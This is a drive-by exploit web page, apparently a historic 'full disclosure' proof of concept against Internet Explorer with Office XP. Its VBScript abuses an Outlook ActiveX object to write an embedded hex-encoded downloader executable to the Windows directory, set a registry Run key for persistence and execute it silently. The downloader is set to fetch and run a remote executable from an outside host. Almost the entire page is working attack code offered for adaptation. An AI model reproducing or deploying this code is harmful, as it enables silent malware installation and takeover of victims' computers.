Aladino

<HTML>
<HEAD>
<TITLE>MS INTERNET EXPLORER + OFFICEXP FULL DISCLOSURE EXPLOIT</TITLE>
</HEAD>
<BODY>
<!-- this object, installed by officeXP will allow us to load -->
<!-- unsafe objects. Someone at M$ made a big mistake by making this -->
<!-- object "safe for scripting" which means it can be loaded from -->
<!-- internet explorer or outlook (express) -->
<OBJECT id="InterfaceObject" classid="clsid:0006F063-0000-0000-C000-000000000046" WIDTH=0 HEIGHT=0>
	<param name="folder" value="Inbox">
</OBJECT>

<SCRIPT LANGUAGE="VBSCRIPT">
<!-- hide for safe browsers

dim FileContent,fso,windir,file,filename,key,wshshell,landurl,overflow,dnloadurl

'the 3 main steps in this script
SetupFile
Upload
Run

'sets up the binary data of downloader.exe in memory
sub SetupFile()
	'we set up the filecontent variable which contains the binary data
	'of downloader.exe, its parameters are parsed into the file directly
	'using this script, adapt them to your needs
	FileContent=Array()
	FileContent=decode("4D5A50000200000004000F00FFFF0000B80000000000000040001A"+wstring("0",69)+"10000BA10000E1FB409CD21B8014CCD219090546869732070726F6772616D206D7573742062652072756E20756E6465722057696E33320D0A2437"+wstring("0",272)+"504500004C010400342ABB940000000000000000E0008E810B01021900040000000C000000000000191000000010000000200000000040000010000000020000010000000000000003000A00000000000050000000040000000000000100000000001000002000000000100000100000000000001000000000000000000000000030000022020000000000000000000000000000000000000000000000000000004000009C"+wstring("0",166)+"434F44450000000000100000001000000004000000060000000000000000000000000000200000604441544100000000001000000020000000060000000A0000000000000000000000000000400000C02E6964617461000000100000003000000004000000100000000000000000000000000000400000C02E72656C6F630000001000000040000000020000001400000000000000000000000000004000005"+wstring("0",1745)+"C8000000FF7508E8A1020000FF750C50E886020000C9C208006800204000E88A020000680920400050E86D02000083F800740A909090906A016A00FFD068282040006801010000E8790200000BC0740690909090EBE7680001000068B4214000E8540200000BC075ED68B4214000E84C0200000BC074DF508B008B185883C00483FB0075F283C0048B008B008B003D7F0000017510909090906810270000E810020000EBB168004000006A40E8F001000083F80074EFA3C923400068DD23400068D5234000E836FFFFFF83F80074ECA32124400068EB23400068D5234000E81DFFFFFF83F80074ECA32524400068FC23400068D5234000E804FFFFFF83F80074ECA329244000680D24400068D5234000E8EBFEFFFF83F80074ECA32D2440006A006A006A006A0068B6234000FF1521244000A3C12340006A006A0068FF0000006A0068B4224000FF35C1234000FF1525244000A3C52340006A0068800000006A026A006A0068000000C06834234000E80F01000083F8FF74DFA3D123400068CD2340006800400000FF35C9234000FF35C5234000FF1529244000833DCD234000007424909090906A0068CD234000FF35CD234000FF35C9234000FF35D1234000E8B8000000EBB7FF35C1234000FF152D244000FF35C5234000FF152D244000FF35D1234000E88D000000FF35C9234000E8B20000006831244000E896000000C7055D2440000100000066C7056124400001006875244000683124400068B42340006A0068100200046A006A006A0068342340006A00E84F0000006889244000688D244000FF3585244000E87C00000068BB244000FF3589244000E872000000FF3589244000E86D0000006A00E81E000000FF25A4304000FF25A8304000FF25AC304000FF25B0304000FF25B4304000FF25B8304000FF25BC304000FF25C0304000FF25C4304000FF25C8304000FF25CC304000FF25D0304000FF25D8304000FF25DC304000FF25E0304000FF25E8304000FF25EC304000FF25F0304"+wstring("0",585)+"4B45524E454C33320052656769737465725365727669636550726F63657373"+wstring("0",1322))
	'WIN32ASM DOWNLOADER PARAMETER 1 : DOWNLOAD URL
	dnloadurl="http://www.duho.org/eatme.exe"
	overflow=0
	if len(dnloadurl) > 29 then overflow = len(dnloadurl)-29
	FileContent=FileContent+dnloadurl+chr(0)+wstring("A",98-overflow)
	'WIN32ASM DOWNLOADER PARAMETER 2 : TARGET LOCATION (incl. drive+path)
	landurl = "/takeover.exe"
	overflow=0
	if len(landurl) > 13 then overflow = len(landurl)-13
	FileContent=FileContent+landurl+chr(0)+wstring("A",114-overflow)
	FileContent=FileContent+decode("2F005B42797465526167655D00000000000000000000000000000000000000000057494E494E455400496E7465726E65744F70656E4100496E7465726E65744F70656E55726C4100496E7465726E65745265616446696C6500496E7465726E6574436C6F736548616E646C65"+wstring("0",203)+"200008000000000536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E5C52756E0077696E333836"+wstring("0",638)+"503000000000000000000000F8300000A430000084300000000000000000000005310000D830000094300000000000000000000011310000E830000000000000000000000000000000000000000000001E3100002831000036310000423100005031000062310000703100008231000094310000A2310000B0310000C031000000000000C8310000D6310000E631000000000000F43100000232000014320000000000001E3100002831000036310000423100005031000062310000703100008231000094310000A2310000B0310000C031000000000000C8310000D6310000E631000000000000F43100000232000014320000000000004B45524E454C33322E646C6C0057534F434B33322E646C6C0041445641504933322E646C6C00000057696E45786563000000436C6F736548616E646C65000000577269746546696C6500000043726561746546696C654100000043726561746550726F6365737341000000004578697450726F6365737300000047657453746172747570496E666F4100000047657450726F634164647265737300000000476C6F62616C416C6C6F63000000476C6F62616C46726565000000004C6F61644C6962726172794100000000536C656570000000676574686F73746E616D65000000676574686F737462796E616D6500000057534153746172747570000000005265674F70656E4B65794100000052656744656C65746556616C756541000000526567436C6F73654B6579"+wstring("0",960)+"1000009C0000001A3024303E305C306A30B730BC30C130D030D530DA30E930EE30F330023107310C311B3128312E313331433149314F3154316B317A317F318A31903196319C31AA31B031B631BC31C931CF31D531DB31E131EC31F63101320C32133218321D322F323B3240324632503256326132733279327F3285328B32913297329D32A332A932AF32B532BB32C132C732CD32D332D932"+wstring("0",5838))
end sub

'writes downloader.exe to disk in the windows directory
sub Upload()
	'set up the object, and use it to load the filesystemobject,
	'enabling us (among other things) to write stuff to disk
	set inbox = InterfaceObject.object.selection
	set mail = inbox.Item(1)
	set fso = mail.Session.Application.CreateObject("Scripting.FileSystemObject")
	'get the windoze dir and write downloader.exe (=FileContent) to disk
	windir = fso.getspecialfolder(0)
	filename = "downloader.exe"
	set file = fso.opentextfile(windir+"\"+filename, "2", "TRUE")
	file.write FileContent
	file.close()
end sub

sub Run()
	'set up the object, and use it to load the windows shell object,
	'enabling us to write registry keys
	'and run files
	key = "HKLM\Software\Microsoft\WinNT\CurrentVersion\Run\win386" 
	set wshShell = mail.Session.Application.CreateObject("WScript.Shell")
	wshShell.regwrite key,filename
	wshShell.run filename,"0","FALSE"
	set wshShell = Nothing
	set fso = Nothing
	set inbox = Nothing
	set mail = Nothing
	set file = Nothing
end sub

'function that decodes our fake-ascii-hex-binary into true binary
Function Decode(Text)
	dim x,thebyte,temptext
	For x = 1 To Len(Text) Step 2
		thebyte = Chr(38) & "H" & Mid(Text, x, 2)
		temptext = temptext & Chr(thebyte)
	Next
	Decode = temptext
End Function

'function that offers us simple compression, by replacing e.g. 1000 zero 
'characters ("000...") by one function name: wstring("0",1000)
function wstring(text,times)
	dim x
	for x=1 to times
		wstring = wstring & text
	next
end function
-->
</script>

<noscript>
Sorry, you have to view this page with Internet Explorer 4.0 or higher, <br> also enable scripting, activex  and <br>
install officeXP in order to be vulnerable.
</noscript>

</BODY>
</HTML>